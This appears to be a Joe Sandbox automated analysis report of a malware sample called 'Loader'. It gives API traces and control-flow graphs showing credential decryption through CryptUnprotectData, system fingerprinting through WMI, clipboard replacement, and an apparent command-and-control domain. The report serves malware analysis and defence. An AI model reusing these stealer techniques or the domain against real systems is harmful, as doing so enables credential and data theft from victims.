                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 158306478-0
                                                                                                                • Opcode ID: 9dc3e59d2104e46a51e5bd0032cd2ac7e8b0a971e58c9d227a5a5cb9b5f3a527
                                                                                                                • Instruction ID: 44a74750a3d50ddadf136801311ad7195afc80b53598e95685e62a35dbe60c8e
                                                                                                                • Opcode Fuzzy Hash: 9dc3e59d2104e46a51e5bd0032cd2ac7e8b0a971e58c9d227a5a5cb9b5f3a527
                                                                                                                • Instruction Fuzzy Hash: 0911EDF2901A4B7FA72167BA5CC9D7F69ACDE843E43100027FA09A1344EE21CE01B5B0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CDA1E5
                                                                                                                • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?), ref: 00CDA21C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodePageValid
                                                                                                                • String ID: utf8
                                                                                                                • API String ID: 943130320-905460609
                                                                                                                • Opcode ID: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
                                                                                                                • Instruction ID: 69bcb6ecc8bc961f5dda2b8cd72b25758425dedc841c6775f251907defd2903f
                                                                                                                • Opcode Fuzzy Hash: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
                                                                                                                • Instruction Fuzzy Hash: 5E51D471600705BADB25AB71CC42BBA73A9EF44700F14042BFB599B391EB70EE4096A7
                                                                                                                APIs
                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CD5071,?,?,00000000,00000000,00000000,?), ref: 00CD5195
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                • Opcode ID: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
                                                                                                                • Instruction ID: d3be2a93a58237ddd89be69764adb2e7e60903885c7640748034030d17a2f5af
                                                                                                                • Opcode Fuzzy Hash: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
                                                                                                                • Instruction Fuzzy Hash: 06418972900609AFCF15CF98CD81AEEBBB5FF08304F18805AFA24A7311D335AA50DB51

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:6.3%
                                                                                                                Dynamic/Decrypted Code Coverage:4.9%
                                                                                                                Signature Coverage:48.9%
                                                                                                                Total number of Nodes:329
                                                                                                                Total number of Limit Nodes:32
                                                                                                                execution_graph 30072 408680 30074 40868f 30072->30074 30073 408998 ExitProcess 30074->30073 30075 4086a4 GetCurrentProcessId GetCurrentThreadId 30074->30075 30086 40898a 30074->30086 30077 4086ce SHGetSpecialFolderPathW 30075->30077 30079 408820 30077->30079 30079->30079 30080 43ac00 RtlAllocateHeap 30079->30080 30081 408859 GetForegroundWindow 30080->30081 30084 4088cf 30081->30084 30083 408981 30083->30086 30084->30083 30089 40cd30 CoInitializeEx 30084->30089 30090 43c600 FreeLibrary 30086->30090 30090->30073 29830 43d1c2 29831 43d1f0 29830->29831 29832 43d23e 29831->29832 29837 43c680 LdrInitializeThunk 29831->29837 29836 43c680 LdrInitializeThunk 29832->29836 29835 43d331 29836->29835 29837->29832 29838 43cbc1 29839 43cbe0 29838->29839 29840 43cc2e 29839->29840 29844 43c680 LdrInitializeThunk 29839->29844 29843 43c680 LdrInitializeThunk 29840->29843 29843->29840 29844->29840 29845 43c9c6 29847 43ca00 29845->29847 29846 43cb3e 29847->29846 29849 43c680 LdrInitializeThunk 29847->29849 29849->29846 30091 42b305 FreeLibrary 30093 42b30c 30091->30093 30092 42b39b GetComputerNameExA 30093->30092 30093->30093 30094 5c91000 30095 5c91102 30094->30095 30096 5c91012 30094->30096 30097 5c9103a OpenClipboard 30096->30097 30098 5c91030 Sleep 30096->30098 30099 5c910f9 GetClipboardSequenceNumber 30097->30099 30100 5c9104a GetClipboardData 30097->30100 30098->30096 30099->30096 30101 5c9105a GlobalLock 30100->30101 30102 5c910f3 CloseClipboard 30100->30102 30101->30102 30103 5c9106b GlobalAlloc 30101->30103 30102->30099 30105 5c910e9 GlobalUnlock 30103->30105 30106 5c9109d GlobalLock 30103->30106 30105->30102 30107 5c910b0 30106->30107 30108 5c910b9 GlobalUnlock 30107->30108 30109 5c910cb EmptyClipboard SetClipboardData 30108->30109 30110 5c910e0 GlobalFree 30108->30110 30109->30105 30109->30110 30110->30105 29850 42d4c8 CoSetProxyBlanket 30111 420310 30112 420324 30111->30112 30114 42040c 30111->30114 30115 420450 30112->30115 30116 420460 30115->30116 30116->30116 30117 43fa80 LdrInitializeThunk 30116->30117 30118 42055f 30117->30118 30119 436597 30120 4365c4 30119->30120 30121 43660f 30120->30121 30123 43c680 LdrInitializeThunk 30120->30123 30123->30120 29851 419654 29852 4194d6 29851->29852 29852->29851 29855 43c680 LdrInitializeThunk 29852->29855 29854 419649 29855->29854 30124 42a41e 30125 42a428 30124->30125 30128 4372c0 30125->30128 30129 4372e5 30128->30129 30132 43737a 30129->30132 30137 43c680 LdrInitializeThunk 30129->30137 30130 42a436 30132->30130 30134 43746d 30132->30134 30136 43c680 LdrInitializeThunk 30132->30136 30134->30130 30138 43c680 LdrInitializeThunk 30134->30138 30136->30132 30137->30129 30138->30134 30139 43cf9f 30140 43cfd0 30139->30140 30140->30140 30141 43d02e 30140->30141 30145 43c680 LdrInitializeThunk 30140->30145 30146 43c680 LdrInitializeThunk 30141->30146 30144 43d128 30145->30141 30146->30144 30147 41929d 30148 419290 30147->30148 30148->30147 30149 419449 CryptUnprotectData 30148->30149 30149->30148 30150 419473 30149->30150 30150->30150 30151 421a9f 30152 421ab6 30151->30152 30160 421b47 30151->30160 30156 421b42 30152->30156 30163 43c680 LdrInitializeThunk 30152->30163 30154 4221b5 30154->30160 30164 43c680 LdrInitializeThunk 30154->30164 30155 4220cb 30155->30154 30155->30155 30155->30160 30166 43c680 LdrInitializeThunk 30155->30166 30156->30155 30157 4226f6 30156->30157 30156->30160 30165 43c680 LdrInitializeThunk 30157->30165 30159 42271b 30160->30160 30163->30156 30164->30154 30165->30159 30166->30155 30167 42ae1d 30169 42ae40 30167->30169 30168 42af2e 30169->30168 30171 43c680 LdrInitializeThunk 30169->30171 30171->30168 29856 40e460 29860 409770 29856->29860 29858 40e46c CoUninitialize 29859 40e490 29858->29859 29861 409784 29860->29861 29861->29858 30172 4196a0 30173 4196d0 30172->30173 30179 41970e 30173->30179 30217 43c680 LdrInitializeThunk 30173->30217 30175 419808 30176 41987e 30175->30176 30190 419bc2 30175->30190 30208 43c680 LdrInitializeThunk 30175->30208 30177 43ac00 RtlAllocateHeap 30176->30177 30180 41994f 30176->30180 30183 4198ef 30177->30183 30179->30175 30218 43c680 LdrInitializeThunk 30179->30218 30180->30180 30181 419a37 LoadLibraryExW 30180->30181 30180->30190 30184 419a4f 30181->30184 30183->30180 30209 43c680 LdrInitializeThunk 30183->30209 30186 419b11 LookupPrivilegeValueW 30184->30186 30192 419b70 30184->30192 30187 419c57 FreeLibrary 30186->30187 30193 419b23 30186->30193 30187->30192 30189 419b6e 30189->30187 30191 419bf2 FreeLibrary 30189->30191 30195 419c10 30191->30195 30192->30190 30219 43c680 LdrInitializeThunk 30192->30219 30193->30189 30210 43c680 LdrInitializeThunk 30193->30210 30197 419c52 30195->30197 30220 43c680 LdrInitializeThunk 30195->30220 30198 419d4e 30197->30198 30211 43c680 LdrInitializeThunk 30197->30211 30198->30190 30200 43ac00 RtlAllocateHeap 30198->30200 30201 419dbb 30200->30201 30207 419e0e 30201->30207 30212 43c680 LdrInitializeThunk 30201->30212 30205 43c680 LdrInitializeThunk 30205->30207 30206 43ac00 RtlAllocateHeap 30206->30207 30207->30190 30207->30205 30207->30206 30207->30207 30213 43af30 30207->30213 30221 43b080 LdrInitializeThunk 30207->30221 30208->30176 30209->30180 30210->30189 30211->30198 30212->30207 30214 43b01e 30213->30214 30215 43af42 30213->30215 30214->30207 30215->30214 30222 43c680 LdrInitializeThunk 30215->30222 30217->30179 30218->30175 30219->30190 30220->30197 30221->30207 30222->30214 29862 43ac60 29863 43ac90 29862->29863 29864 43ad0e 29863->29864 29870 43c680 LdrInitializeThunk 29863->29870 29869 43ae0e 29864->29869 29871 43ac00 29864->29871 29867 43ad74 29867->29869 29874 43c680 LdrInitializeThunk 29867->29874 29870->29864 29875 43dd10 29871->29875 29873 43ac0a RtlAllocateHeap 29873->29867 29874->29869 29876 43dd20 29875->29876 29876->29873 29876->29876 30223 43c620 30224 43c638 30223->30224 30225 43c65a 30223->30225 30228 43c660 30223->30228 30227 43c64b RtlReAllocateHeap 30224->30227 30224->30228 30226 43ac00 RtlAllocateHeap 30225->30226 30226->30228 30227->30228 29878 4360eb 29879 43610f 29878->29879 29880 436129 GetUserDefaultUILanguage 29879->29880 29881 436158 29880->29881 29882 42b3f2 29883 42b3fc GetComputerNameExA 29882->29883 29885 40d471 29886 40d490 29885->29886 29889 4375f0 29886->29889 29888 40d597 29888->29888 29890 437620 RtlExpandEnvironmentStrings 29889->29890 29892 437705 29890->29892 29893 4377ce CoCreateInstance 29890->29893 29892->29893 29894 437825 SysAllocString 29893->29894 29895 437d5f 29893->29895 29898 43789f 29894->29898 29896 437d6f GetVolumeInformationW 29895->29896 29906 437d86 29896->29906 29899 437d4b SysFreeString 29898->29899 29900 4378ae CoSetProxyBlanket 29898->29900 29899->29895 29901 437d41 29900->29901 29902 4378ce SysAllocString 29900->29902 29901->29899 29904 437980 29902->29904 29904->29904 29905 4379ae SysAllocString 29904->29905 29908 4379d4 29905->29908 29906->29888 29907 437d2c SysFreeString SysFreeString 29907->29901 29908->29907 29909 437d1f 29908->29909 29910 437a1b VariantInit 29908->29910 29909->29907 29912 437a70 29910->29912 29911 437d0e VariantClear 29911->29909 29912->29911 30229 43ac32 30230 43ac40 30229->30230 30231 43ac42 30229->30231 30232 43ac47 RtlFreeHeap 30231->30232 30233 418b32 30234 418b30 30233->30234 30236 41893c 30233->30236 30234->30233 30235 418b62 CryptUnprotectData 30234->30235 30234->30236 30235->30234 30235->30236 30237 415bb7 30239 415bc0 30237->30239 30238 415d40 CryptUnprotectData 30239->30238 29913 43c7f4 29914 43c800 29913->29914 29914->29914 29915 43c8a4 GetForegroundWindow 29914->29915 29916 43c8b3 29915->29916 29917 40cd78 CoInitializeSecurity CoInitializeSecurity 29918 410d78 29919 410d95 29918->29919 29920 41115d RtlExpandEnvironmentStrings 29919->29920 29922 40ef91 29919->29922 29923 4111c8 29920->29923 29923->29922 29924 415480 29923->29924 29925 4154a0 29924->29925 29938 43f8c0 29925->29938 29927 41561d 29929 41563f 29927->29929 29932 4157e6 29927->29932 29935 415872 29927->29935 29937 41567c 29927->29937 29942 43fc40 LdrInitializeThunk 29927->29942 29929->29932 29929->29935 29929->29937 29943 43fd30 29929->29943 29932->29937 29949 43c680 LdrInitializeThunk 29932->29949 29934 415da8 29935->29935 29936 43f8c0 LdrInitializeThunk 29935->29936 29936->29937 29937->29922 29940 43f8d0 29938->29940 29939 43fa2e 29939->29927 29940->29939 29950 43c680 LdrInitializeThunk 29940->29950 29942->29929 29944 43fd50 29943->29944 29946 43fdce 29944->29946 29951 43c680 LdrInitializeThunk 29944->29951 29947 41566d 29946->29947 29952 43c680 LdrInitializeThunk 29946->29952 29947->29932 29947->29935 29947->29937 29949->29934 29950->29939 29951->29946 29952->29947 29953 40dbfa 29954 40dc10 29953->29954 29957 40dc5e 29954->29957 30033 43c680 LdrInitializeThunk 29954->30033 29955 40dd0e 29973 4227c0 29955->29973 29957->29955 30034 43c680 LdrInitializeThunk 29957->30034 29960 40dd4d 29984 4232a0 29960->29984 29962 40dd8d 29994 424d50 29962->29994 29966 40ddb6 30012 425a40 29966->30012 29968 40ddbf 30017 4284f0 29968->30017 29970 40ddc8 30035 431b60 6 API calls 29970->30035 29972 40de11 29974 422810 29973->29974 29974->29974 29975 422851 RtlExpandEnvironmentStrings 29974->29975 29976 4228a0 29975->29976 29977 4228dd RtlExpandEnvironmentStrings 29976->29977 29980 422921 29976->29980 29982 422a01 29976->29982 29983 422900 29976->29983 29977->29980 29977->29982 29977->29983 29978 422b61 GetLogicalDrives 29979 43fa80 LdrInitializeThunk 29978->29979 29979->29983 29980->29980 30036 43fa80 29980->30036 29982->29978 29982->29982 29982->29983 29983->29960 29985 4232ae 29984->29985 30041 43e710 29985->30041 29987 423347 29989 423409 29987->29989 29992 423030 29987->29992 30045 43eb90 RtlAllocateHeap LdrInitializeThunk 29987->30045 30046 43e840 29989->30046 29991 42343f 29991->29992 29993 43e710 LdrInitializeThunk 29991->29993 29992->29962 29993->29991 29999 424d76 29994->29999 29995 425160 29997 43e840 2 API calls 29995->29997 29996 43e710 LdrInitializeThunk 29996->29999 30000 425182 29997->30000 29999->29995 29999->29996 29999->30000 30002 40ddad 29999->30002 30003 43c680 LdrInitializeThunk 29999->30003 30057 43f2a0 29999->30057 30001 43e840 2 API calls 30000->30001 30001->30002 30004 4256e0 30002->30004 30003->29999 30005 425710 30004->30005 30006 42575e 30005->30006 30067 43c680 LdrInitializeThunk 30005->30067 30008 43ac00 RtlAllocateHeap 30006->30008 30011 42582e 30006->30011 30009 4257bf 30008->30009 30009->30011 30068 43c680 LdrInitializeThunk 30009->30068 30011->29966 30014 425a49 30012->30014 30013 425a54 30013->29968 30014->30013 30069 438800 RtlAllocateHeap LdrInitializeThunk 30014->30069 30016 426410 30016->29968 30016->30016 30018 428590 30017->30018 30018->30018 30019 4285b3 RtlExpandEnvironmentStrings 30018->30019 30022 428600 30019->30022 30020 4286f6 30070 43fc40 LdrInitializeThunk 30020->30070 30021 42869e 30024 43f8c0 LdrInitializeThunk 30021->30024 30022->30020 30022->30021 30023 428689 30022->30023 30028 428722 30022->30028 30030 42866a RtlExpandEnvironmentStrings 30022->30030 30031 428755 30022->30031 30023->29970 30027 4286b9 30024->30027 30027->30020 30027->30023 30027->30028 30027->30031 30028->30023 30029 43fd30 LdrInitializeThunk 30028->30029 30028->30031 30029->30031 30030->30020 30030->30021 30030->30023 30030->30028 30030->30031 30031->30023 30032 43f8c0 LdrInitializeThunk 30031->30032 30071 43fc40 LdrInitializeThunk 30031->30071 30032->30031 30033->29957 30034->29955 30035->29972 30037 43faa0 30036->30037 30037->30037 30038 43fbee 30037->30038 30040 43c680 LdrInitializeThunk 30037->30040 30038->29982 30040->30038 30042 43e730 30041->30042 30043 43e80e 30042->30043 30054 43c680 LdrInitializeThunk 30042->30054 30043->29987 30045->29987 30047 43e860 30046->30047 30048 43e8de 30047->30048 30055 43c680 LdrInitializeThunk 30047->30055 30049 43ac00 RtlAllocateHeap 30048->30049 30053 43ea3e 30048->30053 30051 43e997 30049->30051 30051->30053 30056 43c680 LdrInitializeThunk 30051->30056 30053->29991 30054->30043 30055->30048 30056->30053 30058 43f2b1 30057->30058 30059 43f46e 30058->30059 30065 43c680 LdrInitializeThunk 30058->30065 30061 43ac00 RtlAllocateHeap 30059->30061 30064 43f61e 30059->30064 30062 43f503 30061->30062 30062->30064 30066 43c680 LdrInitializeThunk 30062->30066 30064->29999 30065->30059 30066->30064 30067->30006 30068->30011 30069->30016 30070->30023 30071->30031 30240 432538 30241 43253d 30240->30241 30242 432570 GetSystemMetrics GetSystemMetrics 30241->30242 30243 4325af 30242->30243

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 4375f0-437612 1 437620-437646 0->1 1->1 2 437648-437656 1->2 3 437660-437674 2->3 3->3 4 437676-4376b4 3->4 5 4376c0-4376e3 4->5 5->5 6 4376e5-4376ff RtlExpandEnvironmentStrings 5->6 7 437705-43770e 6->7 8 4377ce-43781f CoCreateInstance 6->8 9 437710-4377a6 7->9 10 437825-437856 8->10 11 437d5f-437d84 call 43e160 GetVolumeInformationW 8->11 9->9 13 4377ac-4377ca 9->13 14 437860-437874 10->14 17 437d86-437d8a 11->17 18 437d8e-437d90 11->18 13->8 14->14 16 437876-4378a8 SysAllocString 14->16 23 437d4b-437d5b SysFreeString 16->23 24 4378ae-4378c8 CoSetProxyBlanket 16->24 17->18 19 437dad-437db7 18->19 21 437dd0-437dea 19->21 22 437db9-437dc0 19->22 28 437df0-437e2b 21->28 22->21 27 437dc2-437dce 22->27 23->11 25 437d41-437d47 24->25 26 4378ce-4378de 24->26 25->23 29 4378e0-4378fd 26->29 27->21 28->28 30 437e2d-437e62 28->30 29->29 31 4378ff-437976 SysAllocString 29->31 32 437e70-437eab 30->32 34 437980-4379ac 31->34 32->32 33 437ead-437ee1 call 41d440 32->33 38 437ef0-437ef8 33->38 34->34 36 4379ae-4379d6 SysAllocString 34->36 41 437d2c-437d3e SysFreeString * 2 36->41 42 4379dc-437a01 36->42 38->38 40 437efa-437efc 38->40 43 437f02-437f12 call 408110 40->43 44 437da0-437da7 40->44 41->25 49 437a07-437a0a 42->49 50 437d1f-437d28 42->50 43->44 44->19 46 437f17-437f1e 44->46 49->50 51 437a10-437a15 49->51 50->41 51->50 52 437a1b-437a63 VariantInit 51->52 53 437a70-437aa6 52->53 53->53 54 437aa8-437aba 53->54 55 437abe-437ac7 54->55 56 437d0e-437d1b VariantClear 55->56 57 437acd-437ad3 55->57 56->50 57->56 58 437ad9-437ae3 57->58 59 437ae5-437aea 58->59 60 437b1d 58->60 61 437afc-437b00 59->61 62 437b1f-437b3f call 408060 60->62 63 437b02-437b0b 61->63 64 437af0 61->64 71 437ca5-437cc8 62->71 72 437b45-437b52 62->72 67 437b12-437b16 63->67 68 437b0d-437b10 63->68 66 437af1-437afa 64->66 66->61 66->62 67->66 70 437b18-437b1b 67->70 68->66 70->66 74 437d01-437d0a call 408070 71->74 75 437cca-437ce0 71->75 72->71 73 437b58-437b63 72->73 76 437b70-437b7a 73->76 74->56 75->74 77 437ce2-437cf8 75->77 79 437b90-437b95 76->79 80 437b7c-437b84 76->80 77->74 81 437cfa-437cfd 77->81 84 437b97-437b9a 79->84 85 437bde-437bec 79->85 83 437bba-437bbc 80->83 81->74 87 437bbe-437bc2 83->87 84->85 86 437b9c-437bb7 84->86 88 437c4f-437c58 85->88 89 437bee-437bf1 85->89 86->83 90 437bc5-437bcf 87->90 92 437c61-437c66 88->92 93 437c5a-437c5c 88->93 89->88 91 437bf3-437c4a 89->91 90->71 96 437bd5-437bd7 90->96 91->87 94 437c9b-437ca0 92->94 95 437c68-437c96 92->95 93->90 94->87 95->87 96->76 97 437bd9 96->97 97->71
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,47F545A1,8D8C93A7,?,^WPQ,?), ref: 004376FB
                                                                                                                • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437814
                                                                                                                • SysAllocString.OLEAUT32(47F545A1), ref: 00437877
                                                                                                                • CoSetProxyBlanket.COMBASE(234EB62B,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004378C0
                                                                                                                • SysAllocString.OLEAUT32(47F545A1), ref: 00437900
                                                                                                                • SysAllocString.OLEAUT32(47F545A1), ref: 004379AF
                                                                                                                • VariantInit.OLEAUT32(^WPQ), ref: 00437A20
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$BlanketCreateEnvironmentExpandInitInstanceProxyStringsVariant
                                                                                                                • String ID: ,-$:$\$^WPQ$u@P$w)y+$y@P
                                                                                                                • API String ID: 1094070830-2312098703
                                                                                                                • Opcode ID: c8f4d1e411c4d3d4e77a0d712e2afde03ca7b99385f9f459733e735439b93fc8
                                                                                                                • Instruction ID: 1391369bab9cb79c0d95e69b9b664ab1f6950a92ea3c911c3add56bdd0495d94
                                                                                                                • Opcode Fuzzy Hash: c8f4d1e411c4d3d4e77a0d712e2afde03ca7b99385f9f459733e735439b93fc8
                                                                                                                • Instruction Fuzzy Hash: D432DEB26483408BD724CF24C8807ABBBE1EFC9314F149A2EE9D59B391D778D805CB56

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000001), ref: 05C91032
                                                                                                                • OpenClipboard.USER32(00000000), ref: 05C9103C
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 05C9104C
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 05C9105D
                                                                                                                • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05C91090
                                                                                                                • GlobalLock.KERNEL32 ref: 05C910A0
                                                                                                                • GlobalUnlock.KERNEL32 ref: 05C910C1
                                                                                                                • EmptyClipboard.USER32 ref: 05C910CB
                                                                                                                • SetClipboardData.USER32(0000000D), ref: 05C910D6
                                                                                                                • GlobalFree.KERNEL32 ref: 05C910E3
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 05C910ED
                                                                                                                • CloseClipboard.USER32 ref: 05C910F3
                                                                                                                • GetClipboardSequenceNumber.USER32 ref: 05C910F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96103587935.0000000005C91000.00000020.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96103561963.0000000005C90000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96103612711.0000000005C92000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_5c90000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1416286485-0
                                                                                                                • Opcode ID: e76120c367faa645ef63b52673968efe410d161f98144d1048281022e15b1bf3
                                                                                                                • Instruction ID: 789751b3adc66fa3c12f09cdb825095818404ef9c5adc15fb0a53af1ec69a962
                                                                                                                • Opcode Fuzzy Hash: e76120c367faa645ef63b52673968efe410d161f98144d1048281022e15b1bf3
                                                                                                                • Instruction Fuzzy Hash: 2C218335614251BBDF252BF1AC0FB6A7BACFF04781F081968F986D6150EF228910C7E1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 194 40e460-40e488 call 409770 CoUninitialize 197 40e490-40e4a4 194->197 197->197 198 40e4a6-40e4bf 197->198 199 40e4c0-40e512 198->199 199->199 200 40e514-40e579 199->200 201 40e580-40e5de 200->201 201->201 202 40e5e0-40e5f1 201->202 203 40e5f3-40e601 202->203 204 40e61b-40e623 202->204 205 40e610-40e619 203->205 206 40e625-40e62a 204->206 207 40e63d 204->207 205->204 205->205 208 40e630-40e639 206->208 209 40e641-40e64e 207->209 208->208 210 40e63b 208->210 211 40e650-40e657 209->211 212 40e66b-40e673 209->212 210->209 215 40e660-40e669 211->215 213 40e675-40e676 212->213 214 40e68b-40e695 212->214 216 40e680-40e689 213->216 217 40e697-40e69b 214->217 218 40e6ab-40e6b7 214->218 215->212 215->215 216->214 216->216 219 40e6a0-40e6a9 217->219 220 40e6d1-40e7f5 218->220 221 40e6b9-40e6bb 218->221 219->218 219->219 223 40e800-40e858 220->223 222 40e6c0-40e6cd 221->222 222->222 224 40e6cf 222->224 223->223 225 40e85a-40e875 223->225 224->220 226 40e880-40e8a4 225->226 226->226 227 40e8a6-40e8d1 call 40b920 226->227 229 40e8d6-40e8f0 227->229
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Uninitialize
                                                                                                                • String ID: K3E$&W-Q$7$?C*]$_YUk$fo` $oE$stingyerasjhru.click
                                                                                                                • API String ID: 3861434553-2320718889
                                                                                                                • Opcode ID: 701536bb2d1ec543a91e6a801cdfe4920f9a634efbefe8ee4d3aee0bab6216a4
                                                                                                                • Instruction ID: dc43b5a20f060efac2224dbc67faab96f555e2419eb3d1dcd562ba34628f3b78
                                                                                                                • Opcode Fuzzy Hash: 701536bb2d1ec543a91e6a801cdfe4920f9a634efbefe8ee4d3aee0bab6216a4
                                                                                                                • Instruction Fuzzy Hash: 6CB1027150C3C18BD3258F2AD4907EBBFE2ABE6308F688D6DD4C867282C7794506CB56
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0043C680: LdrInitializeThunk.NTDLL(0043F89E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C6AE
                                                                                                                • LoadLibraryExW.KERNEL32(1D802383,00000000,00000800), ref: 00419A43
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,1D802383,?), ref: 00419B19
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419BF6
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00419C5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$InitializeLoadLookupPrivilegeThunkValue
                                                                                                                • String ID: ;:98$;:98$;:98
                                                                                                                • API String ID: 206308786-608591628
                                                                                                                • Opcode ID: c00713a351399c09a4409ec9ad8ab2b185c96f97666378763381d3422a103a89
                                                                                                                • Instruction ID: 20dcddc5602d4ad048146b56261b1f52b20bf37ad466c7f365113a58439c88ff
                                                                                                                • Opcode Fuzzy Hash: c00713a351399c09a4409ec9ad8ab2b185c96f97666378763381d3422a103a89
                                                                                                                • Instruction Fuzzy Hash: E98259746093405BE7208F24D8917ABBBE2EBD6714F18992DE4C587392D379DC82CB4B

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
